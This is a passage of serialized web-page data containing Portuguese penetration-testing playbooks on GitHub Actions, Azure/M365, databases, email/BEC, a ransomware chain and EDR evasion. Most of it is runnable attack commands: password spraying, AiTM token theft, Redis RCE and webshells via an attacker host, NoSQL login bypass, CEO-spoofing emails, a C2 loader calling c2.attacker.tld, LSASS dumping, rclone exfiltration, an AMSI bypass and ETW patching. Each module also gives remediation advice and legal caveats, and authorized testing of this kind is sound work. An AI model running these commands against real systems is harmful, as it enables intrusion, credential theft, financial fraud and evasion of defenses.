realmente necessário, fixar checkout ao base ref (não head)","Aplicar permissions: contents: read no workflow level","Auditar com github/codeql + actionlint"],"references":["https://securitylab.github.com/research/github-actions-preventing-pwn-requests/"]},{"finding":"Runner self-hosted compartilhado entre jobs","severity":"alta","description":"Runner Linux não-efêmero processa jobs de múltiplos repos sem isolation.","impact":"Job malicioso instala persistência e captura secrets de jobs subsequentes.","remediation":["Migrar para runners ephemeral (--once + autoscaling com ARC)","Usar GitHub-hosted runners para workloads sem requisitos especiais","Aplicar Just-in-Time runners"]},{"finding":"GITHUB_TOKEN com permissions: write-all em todos workflows","severity":"alta","description":"Default_workflow_permissions = write em settings da org.","impact":"Qualquer workflow pode push, criar release, escrever em packages.","remediation":["Setar default permissions = read em organization settings","Declarar permissions: explicitamente em cada workflow"]}],"legalNote":"PR poisoning afeta workflows reais. Faça PoC apenas em fork próprio ou com autorização do dono do repo. Nunca exfiltre secrets reais."},{"id":"azure","groupId":"cloud","title":"Azure / M365 — Entra ID, Token Theft e Conditional Access Bypass","shortTitle":"Azure / M365","summary":"Pentest contra tenant Microsoft 365: enumeração via Entra ID, password spray, token theft via AiTM, e bypass de Conditional Access via device join.","difficulty":"avancado","duration":"5-7h","objectives":["Enumerar tenant (domínios, usuários) sem autenticação","Password spray controlado","Capturar token via AiTM (evilginx)","Abusar de Microsoft Graph com token roubado","Avaliar Conditional Access"],"prerequisites":["Tenant Azure de cliente autorizado","Domínio de phishing + TLS"],"toolset":["aadinternals","roadtools","graphrunner","evilginx2","msolspray","teamfiltration","azurehound"],"mitre":[{"tactic":"Reconnaissance","technique":"Gather Victim Identity Information","id":"T1589"},{"tactic":"Credential Access","technique":"Brute Force: Password Spraying","id":"T1110.003"},{"tactic":"Credential Access","technique":"Adversary-in-the-Middle","id":"T1557"},{"tactic":"Discovery","technique":"Cloud Service Discovery","id":"T1526"}],"steps":[{"id":"enum","kind":"recon","title":"1. Enumeração unauth de tenant","goal":"Validar usuários e MFA sem autenticação.","commands":[{"tool":"aadinternals","command":"Import-Module AADInternals\nGet-AADIntLoginInformation -UserName user@alvo.com.br\nInvoke-AADIntUserEnumerationAsOutsider -UserName \"users.txt\"","expected":"Existência de conta, tenant ID, MFA habilitado por usuário."},{"tool":"teamfiltration","command":"TeamFiltration --enum --userlist users.txt --domain alvo.com.br"}]},{"id":"spray","kind":"exploit","title":"2. Password spraying controlado","goal":"Tentar 1 senha contra muitos usuários (evita lockout).","commands":[{"tool":"msolspray","command":"python3 MSOLSpray.py --userlist valid_users.txt --password \"Inverno2024\" --no-lockout","notes":"Usar 1 tentativa por usuário a cada > 30 minutos para respeitar smart lockout."},{"tool":"TeamFiltration","command":"TeamFiltration --spray --userlist users.txt --password \"Inverno2024\" --aad"}],"decision":{"question":"Achou 3 logins válidos sem MFA. Próxima ação?","options":[{"id":"graph","label":"Acessar Microsoft Graph e enumerar (read-only)","consequence":"Documenta impacto sem alterar dados. Recomendado.","recommended":true},{"id":"enviar-mail","label":"Enviar e-mail interno para escalar phishing","consequence":"Útil mas pode ativar alertas de DLP."}]}},{"id":"aitm","kind":"exploit","title":"3. AiTM — captura de token de sessão","goal":"Bypass MFA capturando refresh token via evilginx2.","commands":[{"tool":"evilginx2","command":"phishlets hostname o365 login-ms.alvo-corp.com\nphishlets enable o365\nlures create o365\nlures get-url 0"},{"tool":"graphrunner (token roubado)","command":"Connect-GraphRunner -AccessToken $token\nInvoke-GraphRunner -DefaultTeamRoster\nInvoke-DumpApps # apps com consent vazado\nInvoke-SearchSharePointAndOneDrive -SearchTerm \"password\""}]},{"id":"ca-bypass","kind":"privesc","title":"4. Bypass Conditional Access via device join","goal":"Ingressar device \"compliant\" para passar por CA policy.","commands":[{"tool":"roadtools","command":"roadrecon auth --tokenfile tokens.json\nroadrecon gather\nroadtx device --new --name \"DESKTOP-AZ\" --osversion \"10.0.19041\"","expected":"Device joined; PRT obtido; CA policy \"require compliant device\" satisfeita."}],"evidence":["Lista de usuários enum (com flag mfa)","Tokens capturados (decodificados via jwt.io)","Output Graph mostrando files acessíveis","Captura mostrando login bem-sucedido pós device join"]}],"report":[{"finding":"Smart Lockout permite enumeração e spray","severity":"media","description":"Login retorna mensagens diferentes para \"user not found\" vs \"wrong password\", permitindo enumeração offline.","impact":"Atacante valida lista de usuários sem disparar alertas; password spray subsequente é eficaz.","remediation":["Habilitar Smart Lockout com threshold reduzido","Habilitar \"Hide user existence\" (Entra ID Premium P1)","Monitorar UAL para padrões de enumeração"]},{"finding":"Conditional Access sem token protection nem block legacy auth","severity":"alta","description":"CA policies não aplicam Token Protection nem bloqueiam protocolos legacy (POP3, SMTP AUTH).","impact":"Token capturado via AiTM é replay-able; legacy auth permite bypass total de MFA.","remediation":["Bloquear legacy authentication (Conditional Access policy)","Habilitar Continuous Access Evaluation + Token Protection","Aplicar require-compliant-device para apps críticos"]},{"finding":"Permissões de aplicações OAuth excessivas (Mail.ReadWrite, Files.Read.All)","severity":"alta","description":"8 apps OAuth multi-tenant com permissões delegated amplas, consentidas por usuários comuns.","impact":"App malicioso obtém acesso a e-mails e arquivos sem aprovação do admin.","remediation":["Desabilitar User Consent (require admin consent)","Auditar apps registradas (Get-MgServicePrincipal)","Habilitar Admin Consent Workflow"]}],"legalNote":"Password spraying mesmo controlado pode causar lockouts e alertas de SOC. Coordene janela e POC do cliente para qualquer ação contra tenant produtivo."},{"id":"databases","groupId":"dados","title":"Bancos de Dados — Redis, MongoDB e PostgreSQL","shortTitle":"Bancos de Dados","summary":"Avaliação de bancos de dados frequentemente expostos sem autenticação ou com configuração padrão: Redis (RCE via MODULE LOAD e RDB write), MongoDB (NoSQL injection + acesso público) e PostgreSQL (abuso de COPY FROM PROGRAM com superuser).","difficulty":"intermediario","duration":"3-4h","objectives":["Identificar bancos expostos na internet/intranet","Demonstrar acesso sem credenciais","Explorar Redis para RCE","NoSQL injection em endpoints MongoDB","Avaliar permissões em PostgreSQL"],"prerequisites":["Acesso de rede aos bancos","CLI dos respectivos DBs"],"toolset":["nmap","redis-cli","mongosh","psql","sqlmap","NoSQLMap","pgrolelookup"],"mitre":[{"tactic":"Initial Access","technique":"Valid Accounts: Default Accounts","id":"T1078.001"},{"tactic":"Execution","technique":"Exploitation for Client Execution","id":"T1203"},{"tactic":"Exfiltration","technique":"Data from Information Repositories","id":"T1213"}],"steps":[{"id":"discover","kind":"recon","title":"1. Descoberta de bancos expostos","goal":"Encontrar Redis/Mongo/Postgres acessíveis.","commands":[{"tool":"nmap","command":"nmap -p 6379,27017,5432,3306,1433 --script redis-info,mongodb-info 10.0.0.0/16 -oN db_scan.txt"},{"tool":"shodan","command":"shodan search \"product:Redis country:BR\"\nshodan search \"product:MongoDB country:BR -authentication\""}]},{"id":"redis","kind":"exploit","title":"2. Redis — acesso sem auth + RCE","goal":"Validar acesso e demonstrar RCE via module loading ou SLAVEOF.","commands":[{"tool":"redis-cli","command":"redis-cli -h 10.0.0.50 ping\nredis-cli -h 10.0.0.50 INFO\nredis-cli -h 10.0.0.50 KEYS \"*\"","expected":"PONG + INFO completo + listagem de keys."},{"tool":"redis-rogue-server (Redis 4.x–5.0.5, hoje raro)","command":"python3 redis-rogue-server.py --rhost 10.0.0.50 --lhost 10.0.0.99 --exp-mod exp_lin.so","notes":"PoC ORIGINAL de Pavel Toporkov (2019). Em glibc ≥ 2.34 o exp_lin.so NÃO funciona — precisa recompilar com toolchain atualizada ou usar forks mantidos (Ridter/redis-rce). Datado."},{"tool":"MODULE LOAD (Redis 4-6, requer FS write)","command":"redis-cli -h 10.0.0.50\n> CONFIG SET dir /tmp\n> CONFIG SET dbfilename exp.so\n> SLAVEOF attacker.tld 6379 # slave puxa RDB contendo o .so do atacante\n> SLAVEOF NO ONE\n> MODULE LOAD /tmp/exp.so\n> system.exec \"id\"","notes":"Recompile o módulo para a glibc do alvo antes. Em Redis 7+ o comando MODULE LOAD foi restrito a modules com assinatura/path fixo (enable-module-command = no por default)."},{"tool":"webshell via RDB write (qualquer versão sem protected-mode)","command":"redis-cli -h 10.0.0.50\n> CONFIG SET dir /var/www/html\n> CONFIG SET dbfilename shell.php\n> SET pwn \"\"\n> SAVE","expected":"Webshell em http://10.0.0.50/shell.php?c=id","notes":"Funciona enquanto o processo Redis tiver permissão de escrita no docroot. Redis ≥ 7 com protected-mode (default) recusa CONFIG SET de dir sem AUTH."},{"tool":"SSH authorized_keys (clássico, ainda eficaz)","command":"redis-cli -h 10.0.0.50\n> CONFIG SET dir /var/lib/redis/.ssh\n> CONFIG SET dbfilename authorized_keys\n> SET x \"\\n\\nssh-ed25519 AAAA... atacante@kali\\n\\n\"\n> SAVE\nssh -i attacker redis@10.0.0.50"}],"decision":{"question":"Redis tem auth mas é \"redis123\". Próximo passo?","options":[{"id":"auth","label":"AUTH e seguir explorando","consequence":"Acesso confirmado. Documentar e prosseguir.","recommended":true},{"id":"flush","label":"FLUSHALL para \"testar persistência\"","consequence":"PROIBIDO — destruiria dados em produção."}]}},{"id":"mongo","kind":"exploit","title":"3. MongoDB — sem auth + NoSQL injection","goal":"Acesso direto e injeção via API.","commands":[{"tool":"mongosh","command":"mongosh mongodb://10.0.0.51:27017\n> show dbs\n> use prod\n> show collections\n> db.users.find().limit(5)"},{"tool":"NoSQL injection (login bypass)","command":"curl -X POST https://api.alvo/login -H \"Content-Type: application/json\" \\\n -d '{\"user\":\"admin\",\"pass\":{\"$ne\":null}}'","expected":"Login bypass: $ne:null faz a comparação retornar true para qualquer hash."}]},{"id":"postgres","kind":"exploit","title":"4. PostgreSQL — abuso de COPY FROM PROGRAM (superuser)","goal":"RCE quando a conta é superuser ou pertence ao role pg_execute_server_program.","commands":[{"tool":"psql","command":"psql -h 10.0.0.52 -U postgres -W\n> SELECT current_user, session_user, (current_setting('is_superuser')) AS super;\n> CREATE TABLE cmd_exec(cmd_output text);\n> COPY cmd_exec FROM PROGRAM 'id';\n> SELECT * FROM cmd_exec;","expected":"uid=999(postgres) ... (RCE como user postgres no host).","notes":"Desde PostgreSQL 11, COPY FROM PROGRAM exige superuser OU membership no role pg_execute_server_program. Nota sobre CVE-2019-9193: originalmente apontada como \"vulnerabilidade\", foi contestada pelo PG Team (é comportamento documentado para superuser). Tratar como abuso de privilégio, não como bug."},{"tool":"pgrolelookup","command":"pgrolelookup -h 10.0.0.52 -u postgres -p Postgres@123"}],"evidence":["Output redis-cli INFO + KEYS","Webshell ativo (URL + screenshot)","NoSQLi com bypass de login","RCE via COPY FROM PROGRAM"]}],"report":[{"finding":"Redis exposto na internet sem authentication","severity":"critica","description":"Instância Redis em 10.0.0.50:6379 (também acessível externamente em IP público) sem requirepass.","impact":"RCE como user redis no host; webshell trivial via CONFIG SET + SAVE.","remediation":["Habilitar requirepass com senha forte (≥ 32 chars)","Habilitar protected-mode yes","Bind apenas em interfaces internas (bind 10.0.0.50)","Renomear comandos perigosos: rename-command CONFIG \"\""]},{"finding":"MongoDB sem auth + login com NoSQLi","severity":"critica","description":"MongoDB rodando em 10.0.0.51 sem auth + endpoint /login aceitando objetos como senha (NoSQL injection $ne).","impact":"Acesso total ao banco e bypass de login na aplicação.","remediation":["Habilitar --auth e criar usuários com least privilege","Validar tipo (typeof === \"string\") nos campos de input","Usar mongo-sanitize no Node ou framework com validação"]},{"finding":"PostgreSQL com COPY FROM PROGRAM disponível para superuser","severity":"alta","description":"Conta postgres com senha Postgres@123 e COPY FROM PROGRAM permitido.","impact":"RCE no host; pivot para outros sistemas via rede interna.","remediation":["Trocar senha e desabilitar superuser para apps","Restringir pg_hba.conf a IPs específicos","Aplicar princípio do menor privilégio (apenas SELECT/INSERT/UPDATE necessários)"]}],"legalNote":"NUNCA execute FLUSHALL, dropDatabase() ou DROP TABLE em produção. Para PoC use chaves/coleções de teste."},{"id":"email-bec","groupId":"dados","title":"E-mail / SMTP / BEC — Spoofing, Open Relay e Business Email Compromise","shortTitle":"E-mail / SMTP / BEC","summary":"Avaliação completa de infraestrutura de e-mail: SPF/DKIM/DMARC, open relay, spoofing direto, e simulação de BEC (CEO fraud) com domain look-alike.","difficulty":"intermediario","duration":"3-5h","objectives":["Auditar SPF/DKIM/DMARC e BIMI","Identificar open relay / mau roteamento","Demonstrar spoofing intra-domínio","Simular BEC com look-alike domain","Avaliar fluxo de validação financeira"],"prerequisites":["Domínio de teste para envio","Caixa de teste interna no cliente"],"toolset":["mailspoof-checker","swaks","dnstwist","dehashed","gophish","mxtoolbox","open-relay-tester"],"mitre":[{"tactic":"Initial Access","technique":"Phishing","id":"T1566"},{"tactic":"Initial Access","technique":"Phishing: Spearphishing Voice","id":"T1566.004"},{"tactic":"Execution","technique":"User Execution: Malicious Link","id":"T1204.001"},{"tactic":"Defense Evasion","technique":"Impersonation","id":"T1656"}],"steps":[{"id":"audit","kind":"recon","title":"1. Auditoria SPF/DKIM/DMARC","goal":"Verificar registros e política.","commands":[{"tool":"dig + mxtoolbox","command":"dig TXT alvo.com.br +short\ndig TXT _dmarc.alvo.com.br +short\ndig TXT default._domainkey.alvo.com.br +short","expected":"Detectar p=none, ~all (soft fail), ausência de DKIM, etc."},{"tool":"mailspoof-checker","command":"python3 mailspoof.py -d alvo.com.br"}]},{"id":"spoof","kind":"exploit","title":"2. Spoofing direto (sem SPF strict)","goal":"Enviar e-mail \"do CEO\" para área financeira via SMTP externo.","commands":[{"tool":"swaks","command":"swaks --to financeiro@alvo.com.br \\\n --from \"Diretor Financeiro \" \\\n --header \"Subject: URGENTE — Transferência Fornecedor\" \\\n --body @template.txt \\\n --server mail.alvo.com.br","expected":"Aceito pelo MX; chega à caixa sem flag de spoofing se DMARC=none."}],"decision":{"question":"O DMARC está p=quarantine. Como contornar para PoC?","options":[{"id":"lookalike","label":"Usar domínio look-alike (alv0.com.br, alva.com.br)","consequence":"Eficaz contra usuários; passa SPF/DKIM próprios. Recomendado.","recommended":true},{"id":"header","label":"Manipular header From: com encoding","consequence":"DMARC moderno detecta; risco baixo de sucesso."}]}},{"id":"lookalike","kind":"exploit","title":"3. Look-alike domain + BEC","goal":"Registrar variação do domínio e simular fluxo BEC.","commands":[{"tool":"dnstwist","command":"dnstwist --registered alvo.com.br | grep -v \"registered\"","expected":"Lista de domínios disponíveis (typo, IDN, TLD diferente)."},{"tool":"BEC simulation","command":"# 1. Registrar alva-com-br.com\n# 2. Setup SPF/DKIM/DMARC válidos\n# 3. Enviar thread \"encadeada\" simulando reply de fornecedor\n# 4. Solicitar troca de conta bancária com pretexto urgente"}]},{"id":"relay","kind":"exploit","title":"4. Teste de open relay","goal":"Validar se MX aceita relay externo (envio entre domínios sem auth).","commands":[{"tool":"swaks (open relay test)","command":"swaks --to externo@gmail.com --from teste@externo.com --server mail.alvo.com.br","expected":"Esperado: 550 Relay denied. Se aceitar, é open relay (crítico)."}],"evidence":["Output dig dos registros TXT","Screenshot do e-mail spoofado na caixa do alvo","Lista de look-alikes registrados / disponíveis","Print do log SMTP com 250 OK em open relay"]}],"report":[{"finding":"DMARC com p=none — spoofing aceito sem alerta","severity":"alta","description":"_dmarc.alvo.com.br retorna v=DMARC1; p=none; rua=mailto:dmarc@alvo.com.br. Política none não bloqueia nem quarantine.","impact":"Atacante envia mensagens forjadas em nome do domínio sem qualquer flag.","remediation":["Migrar incrementalmente: p=none → p=quarantine → p=reject (com pct=10/50/100)","Habilitar DKIM em todos os tenants emissores","Monitorar relatórios agregados (rua) para identificar emissores legítimos","Implementar BIMI após p=reject"]},{"finding":"Ausência de processo de verificação out-of-band para troca de dados bancários","severity":"critica","description":"BEC simulado conseguiu solicitar troca de conta bancária de fornecedor por e-mail apenas; financeiro não confirmou por telefone.","impact":"Perdas financeiras diretas (média BEC: USD 125k segundo FBI IC3 2023).","remediation":["Política obrigatória de confirmação por telefone (número do cadastro, não do e-mail) para qualquer mudança financeira","Workflow de 2-pessoas para aprovação de transferências > X","Treinamento anti-BEC para C-level e financeiro"],"references":["FBI IC3 BEC Report 2023"]},{"finding":"MX aceita conexão sem STARTTLS obrigatório","severity":"media","description":"mail.alvo.com.br aceita SMTP plain sem upgrade obrigatório para TLS.","impact":"E-mails podem ser interceptados em trânsito (downgrade attack).","remediation":["Configurar MTA-STS (RFC 8461) com mode: enforce","Habilitar DANE (TLSA records)","Forçar TLS 1.2+ no MTA"]}],"legalNote":"BEC envolve engenharia social contra colaboradores reais. Sempre coordenar com RH, ter consentimento informado de quem participa, e usar endereço/conta bancária de teste — nunca dados reais."},{"id":"ransomware","groupId":"redteam","title":"Ransomware — Full Chain Simulation (Educacional)","shortTitle":"Ransomware Full Chain","summary":"Simulação completa de cadeia de ransomware moderno (Big Game Hunting): initial access via phishing, privesc, descoberta de backups, double extortion (exfil + encrypt). 100% educacional, sem encryption real.","difficulty":"especialista","duration":"2-3 dias","objectives":["Mapear cadeia completa: TTPs Conti/LockBit/BlackCat","Demonstrar caminho de phishing → DA em < 24h","Identificar backups e evidência de imutabilidade","Simular exfiltração antes da \"criptografia\"","Avaliar resposta do SOC e tempo de detecção (TTD/TTC)"],"prerequisites":["Autorização escrita C-level + jurídico + insurance","Backup verificado e RTO/RPO documentados","Comunicação com SOC sobre dia/hora (red/purple team)"],"toolset":["cobalt strike (sim. com sliver)","mimikatz","rclone","mega.nz CLI","powerview","crackmapexec","restic-attack"],"mitre":[{"tactic":"Initial Access","technique":"Phishing: Spearphishing Attachment","id":"T1566.001"},{"tactic":"Execution","technique":"User Execution: Malicious File","id":"T1204.002"},{"tactic":"Execution","technique":"Command and Scripting Interpreter","id":"T1059"},{"tactic":"Persistence","technique":"Boot or Logon Autostart Execution","id":"T1547"},{"tactic":"Defense Evasion","technique":"Disable or Modify Tools","id":"T1562.001"},{"tactic":"Credential Access","technique":"OS Credential Dumping: LSASS","id":"T1003.001"},{"tactic":"Lateral Movement","technique":"Remote Services: SMB/Windows Admin Shares","id":"T1021.002"},{"tactic":"Exfiltration","technique":"Exfiltration Over Web Service","id":"T1567"},{"tactic":"Impact","technique":"Data Encrypted for Impact","id":"T1486"},{"tactic":"Impact","technique":"Inhibit System Recovery","id":"T1490"}],"steps":[{"id":"access","kind":"exploit","title":"1. Initial Access — Phishing com macro / ISO","goal":"Obter beacon em estação de trabalho via Office macro ou ISO mounted.","commands":[{"tool":"sliver C2","command":"sliver > generate --mtls c2.attacker.tld --os windows --arch amd64 --save loader.exe\n# Empacotar em ISO + LNK; enviar via phishing\nsliver > listeners"}]},{"id":"privesc","kind":"privesc","title":"2. Privesc local + dump de creds","goal":"Escalar para SYSTEM e dumpar LSASS.","commands":[{"tool":"sliver beacon","command":"beacon> getsystem\nbeacon> execute-assembly /opt/SafetyKatz.exe \"sekurlsa::logonpasswords\" exit"}],"decision":{"question":"EDR detecta dump direto do LSASS. Como contornar (educacional)?","options":[{"id":"comsvcs","label":"comsvcs.dll MiniDump (LOLBin)","consequence":"Frequentemente bypass de EDR baseline; ainda assim detectado por EDRs maduros.","recommended":true},{"id":"silent-process-exit","label":"Silent Process Exit + WerFault","consequence":"Mais furtivo; exige registry write como admin."}]}},{"id":"lateral","kind":"lateral","title":"3. Lateral movement → DA","goal":"Pass-the-Hash + Kerberoast + ADCS para Domain Admin.","commands":[{"tool":"crackmapexec / Rubeus","command":"crackmapexec smb 10.0.0.0/16 -u Administrator -H $HASH --local-auth\nRubeus.exe kerberoast /outfile:roast.txt\nhashcat -m 13100 roast.txt rockyou.txt"}]},{"id":"recon-internal","kind":"enum","title":"4. Recon de alto valor — backups, dados PII","goal":"Localizar backups (Veeam, snapshots), file shares, bancos.","commands":[{"tool":"powerview","command":"Find-DomainShare -CheckShareAccess\nFind-InterestingDomainShareFile -Include \"*.bak,*.kdbx,*passwords*,*backup*\""},{"tool":"enum Veeam","command":"# Verificar serviço Veeam Backup running, credenciais armazenadas\nGet-Service \"VeeamBackupSvc\"\n# (veeamhub) decryption do credentialstore exige acesso ao registry/db"}]},{"id":"exfil","kind":"exfil","title":"5. Exfiltração (double extortion)","goal":"Subir dados sensíveis para storage do atacante (cloud).","commands":[{"tool":"rclone","command":"rclone config create mega mega user attacker pass redacted\nrclone copy \"\\\\fileserver\\Financeiro\" mega:vazamento --bwlimit 5M --transfers 4","notes":"Em PoC educacional, exfil para bucket de teste do red team apenas; tamanho controlado."}]},{"id":"impact-sim","kind":"post","title":"6. Simulação de impacto (sem encryption real)","goal":"Demonstrar capacidade de execução em massa SEM cifrar arquivos.","commands":[{"tool":"PsExec / WMI","command":"crackmapexec smb 10.0.0.0/16 -u Administrator -H $HASH -x \"echo PoC > C:\\PENTEST_RANSOM_PROOF.txt\"","notes":"Apenas escreve arquivo de prova; NÃO cifra nada. Documenta capacidade."}],"evidence":["Beacon log do Sliver com comandos executados","Dump LSASS (anonimizado)","Output kerberoast + senha quebrada","Listagem de arquivos em fileservers","Hashes/sample de dados exfil (bucket atacante)","Arquivo PENTEST_RANSOM_PROOF.txt em N hosts (lista)"]}],"report":[{"finding":"Tempo de detecção (TTD) > 8h em fase de lateral movement","severity":"critica","description":"SOC detectou atividade somente 9h após primeiro beacon, sem alerta nas fases de privesc e lateral via PtH.","impact":"Janela suficiente para exfil completa (≥ 200GB) e domínio inteiro comprometido.","remediation":["Implantar EDR com behavioral detection (CrowdStrike, SentinelOne, MS Defender for Endpoint Plan 2)","Habilitar regras Sigma específicas para LSASS dump, PsExec, comsvcs.dll","Threat hunting trimestral com red team report","SOC playbook acionado em < 30min para indicators de privesc"]},{"finding":"Backups Veeam acessíveis com mesma credencial usada no AD","severity":"critica","description":"O servidor Veeam fica no mesmo AD; conta de serviço com Domain Admin permite delete de jobs e snapshots.","impact":"Atacante destrói backups antes de cifrar — RTO infinito sem pagar resgate.","remediation":["Adotar 3-2-1-1-0 backup rule com 1 cópia imutável (S3 Object Lock, Veeam Hardened Repository)","Backup server fora do domínio principal (workgroup ou AD separado)","MFA na console Veeam + isolated network","Test restore mensal"]},{"finding":"Macro do Office habilitada com prompt simples","severity":"alta","description":"GPO atual permite \"Disable all macros with notification\"; usuários habilitam por hábito.","impact":"Vetor #1 de ransomware moderno via VBA macros.","remediation":["Aplicar \"Disable all macros from the Internet\" via GPO/Intune","Bloquear macros não-assinadas","Habilitar Attack Surface Reduction rules (Defender)","Migrar usuários para Office 365 com Safe Attachments"]}],"legalNote":"NUNCA execute encryption real em sistemas do cliente. Esta é uma simulação cuja finalidade é demonstrar capacidade e tempo de detecção. Manter contato 24/7 com IR team durante o teste e backup verificado antes de iniciar."},{"id":"edr-evasion","groupId":"redteam","title":"AV/EDR Evasion — Bypass de Defesas Modernas (Lab)","shortTitle":"AV/EDR Evasion","summary":"Avaliação de eficácia de AV/EDR em laboratório controlado: bypass de AMSI, ETW patching, syscalls diretos, unhooking de NTDLL, e payload encryption — sempre dentro de scope autorizado.","difficulty":"especialista","duration":"2-4 dias","objectives":["Mapear sensores ativos no endpoint (AV, EDR, AMSI, ETW)","Demonstrar bypass de AMSI em PowerShell","Patching de ETW para silenciar telemetria","Indirect syscalls para chamadas LSASS","Avaliar maturidade do EDR e telemetria capturada"],"prerequisites":["Lab isolado com EDR configurado pelo cliente","Acordo formal de \"EDR assessment\" — não ataque a produção","Coleta de telemetria do EDR em paralelo (purple team)"],"toolset":["havoc","sliver","donut","inceptor","syswhispers3","BananaPhone","pe-sieve","capa"],"mitre":[{"tactic":"Defense Evasion","technique":"Disable or Modify Tools","id":"T1562.001"},{"tactic":"Defense Evasion","technique":"Indicator Removal: Clear Windows Event Logs","id":"T1070.001"},{"tactic":"Defense Evasion","technique":"Reflective Code Loading","id":"T1620"},{"tactic":"Execution","technique":"Native API","id":"T1106"}],"steps":[{"id":"recon","kind":"recon","title":"1. Recon do endpoint defendido","goal":"Identificar AV/EDR e versão de NTDLL/módulos hookados.","commands":[{"tool":"pe-sieve / hollows-hunter","command":"hollows_hunter.exe /pname svchost.exe /shellc /imp R\npe-sieve.exe /pid /imp R","expected":"Quais módulos têm hooks inline (jmp para EDR DLL)."},{"tool":"recon manual","command":"tasklist /SVC | findstr /I \"csfalcon sentinel windefend cb\"\nwmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get /value"}]},{"id":"amsi","kind":"exploit","title":"2. AMSI Bypass","goal":"Silenciar AMSI no processo PowerShell para executar payload.","commands":[{"tool":"PowerShell (in-memory patch)","command":"$$a=[Ref].Assembly.GetTypes() | ? {$_.Name -like \"*siUtils\"}\n$f=$a.GetField(\"amsiInitFailed\",\"NonPublic,Static\")\n$f.SetValue($null,$true)","notes":"Ofuscação obrigatória — string literal \"amsiInitFailed\" é detectada por Defender. Usar concatenação/encoding."}],"decision":{"question":"AMSI bypass óbvio é detectado. Próximo nível?","options":[{"id":"hwbp","label":"Hardware breakpoints + DR registers (sem patch de memória)","consequence":"Não modifica .text, escapa de scans periódicos. Recomendado.","recommended":true},{"id":"unhook","label":"Unhook clr.dll → AMSI nem inicializa","consequence":"Funciona em PowerShell, exige permissões de write na seção .text."}]}},{"id":"etw","kind":"exploit","title":"3. ETW Patching","goal":"Silenciar Event Tracing for Windows no processo.","commands":[{"tool":"in-process patch","command":"// C# stub:\n// var addr = GetProcAddress(LoadLibrary(\"ntdll\"), \"EtwEventWrite\");\n// VirtualProtect(addr, 1, RWX, ...);\n// Marshal.WriteByte(addr, 0xC3); // ret\n"}]},{"id":"syscalls","kind":"exploit","title":"4. Indirect syscalls + unhooking NTDLL","goal":"Evitar hooks de userland em chamadas de LSASS.","commands":[{"tool":"syswhispers3","command":"python3 syswhispers.py -p NtReadVirtualMemory,NtOpenProcess --random --out lsass_dump"},{"tool":"BananaPhone (Go)","command":"go build -ldflags \"-s -w\" -o stealer.exe lsass_stealer.go\n# Usa syscall stubs gerados dinamicamente"}]},{"id":"payload","kind":"post","title":"5. Empacotamento — Donut + crypter","goal":"Converter PE em shellcode encrypted e executar via process hollowing.","commands":[{"tool":"donut + inceptor","command":"donut -i mimikatz.exe -o mk.bin\n# Encrypt + loader em Nim/Rust (perfis menos detectados)\ninceptor build --src mk.bin --crypter aes-rc4 --loader process_hollowing --target svchost.exe"}],"evidence":["Output pe-sieve listando módulos hookados","Captura de telemetria EDR (ou ausência dela) durante o bypass","Hash do payload final + análise capa","Tempo de detecção do EDR para cada técnica"]}],"report":[{"finding":"AMSI bypass via amsiInitFailed funcional (string literal sem ofuscação)","severity":"media","description":"EDR atual detecta a string mas não bloqueia execução pós-bypass.","impact":"Atacante moderadamente capacitado executa qualquer PowerShell malicioso pós-bypass.","remediation":["Habilitar PowerShell Constrained Language Mode em todos os endpoints","Aplicar AppLocker / WDAC para bloquear PowerShell para usuários comuns","Habilitar PowerShell Script Block Logging (Event ID 4104) com SIEM"]},{"finding":"EDR não detecta ETW patching nem indirect syscalls","severity":"alta","description":"EDR baseia detecção majoritariamente em userland hooks; chamadas de syscall direto a NtReadVirtualMemory passam sem alerta.","impact":"LSASS dump invisível. Roubo de credenciais sem qualquer telemetria.","remediation":["Habilitar kernel callbacks (PsSetCreateProcessNotifyRoutineEx) e ETW providers no SIEM","Migrar para EDR com sensor de kernel (não apenas userland)","Habilitar Credential Guard (LSASS isolado em VBS)","Ativar RunAsPPL para LSASS"]},{"finding":"Logs do PowerShell não centralizados","severity":"media","description":"Script Block Logging habilitado apenas localmente; sem forwarding para SIEM.","impact":"Mesmo quando EDR loga, dados ficam nos endpoints — atacante apaga.","remediation":["Configurar Windows Event Forwarding (WEF) → SIEM","Sysmon com config SwiftOnSecurity ou Olaf Hartong","Detection engineering com Sigma rules para PowerShell"]}],"legalNote":"Bypass de EDR só em LAB autorizado e com consentimento explícito do cliente. NUNCA aplicar técnicas em produção fora do escopo. Documentar tudo em purple team report."}]}]}]],null],null]},[["$","html",null,{"lang":"pt-BR","children":["$","body",null,{"children":["$","$L6",null,{"parallelRouterKey":"children","segmentPath":["children"],"error":"$undefined","errorStyles":"$undefined","errorScripts":"$undefined","template":["$","$L7",null,{}],"templateStyles":"$undefined","templateScripts":"$undefined","notFound":[["$","title",null,{"children":"404: This page could not be found."}],["$","div",null,{"style":{"fontFamily":"system-ui,\"Segoe UI\",Roboto,Helvetica,Arial,sans-serif,\"Apple Color Emoji\",\"Segoe UI Emoji\"","height":"100vh","textAlign":"center","display":"flex","flexDirection":"column","alignItems":"center","justifyContent":"center"},"children":["$","div",null,{"children":[["$","style",null,{"dangerouslySetInnerHTML":{"__html":"body{color:#000;background:#fff;margin:0}.next-error-h1{border-right:1px solid rgba(0,0,0,.3)}@media (prefers-color-scheme:dark){body{color:#fff;background:#000}.next-error-h1{border-right:1px solid rgba(255,255,255,.3)}}"}}],["$","h1",null,{"className":"next-error-h1","style":{"display":"inline-block","margin":"0 20px 0 0","padding":"0 23px 0 0","fontSize":24,"fontWeight":500,"verticalAlign":"top","lineHeight":"49px"},"children":"404"}],["$","div",null,{"style":{"display":"inline-block"},"children":["$","h2",null,{"style":{"fontSize":14,"fontWeight":400,"lineHeight":"49px","margin":0},"children":"This page could not be found."}]}]]}]}]],"notFoundStyles":[],"styles":null}]}]}],null],null],"couldBeIntercepted":false,"initialHead":[null,"$L8"],"globalErrorComponent":"$9","missingSlots":"$Wa"}]]